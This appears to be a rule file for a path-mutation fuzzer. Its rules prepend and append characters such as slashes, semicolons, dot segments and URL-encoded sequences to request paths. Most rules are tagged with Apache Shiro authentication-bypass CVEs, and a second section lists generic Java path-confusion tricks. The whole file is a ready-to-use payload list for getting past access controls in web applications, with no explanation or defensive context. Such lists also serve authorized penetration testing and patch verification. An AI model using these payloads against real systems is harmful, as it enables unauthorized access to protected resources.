# base
$/
l
$/ l
u
$/ u
c
$/ c
C
$/ $a
$/ $1
# shiro bypass
^/ ^. ^/ #CVE-2010-3863
^/ ^. ^. ^/ ^s ^j  #CVE-2014-0074
^/ ^; ^. ^. ^/ ^s ^j  #CVE-2020-1957
^/ ^; ^. ^. ^/ ^s ^j $/ #CVE-2020-1957
^;
^; ^/ ^/
^/ ^a ^; ^/
$% $2 $f $1
$% $2 $f $. $j $s
$/ $% $3 $b $1
$/ $% $3 $b $. $j $s
$% $3 $b $1
$% $3 $b $. $j $s
$% $0 $d $% $0 $a
$/ $a $% $2 $5 $% $3 $2 $% $6 $6 #CVE-2020-11989
$/ $% $3 $b $a #CVE-2020-13933
#CVE-2020-17510
$/ $.
$/ $% $2 $e
$/ $% $2 $e $/
$/ $% $2 $e $% $2 $e
$/ $% $2 $e $% $2 $e $/
$/ $% $2 $0 #CVE-2020-17523
i1a i1 0 i1% #CVE-2022-32532

# java common
$. $a
$. $j $s
$/ $~
$#
$; $/
$/ $. $.
$/ $. $/
$; $. $j $s
$/ $/
$. $. $; $/
^/ ^. ^.
^/ ^/
^/ ^/ ^; ^/
^/ ^f ^2 ^% ^/
^/ ^; ^/
^/ ^; ^. ^/
^/ ^e ^2 ^% ^/
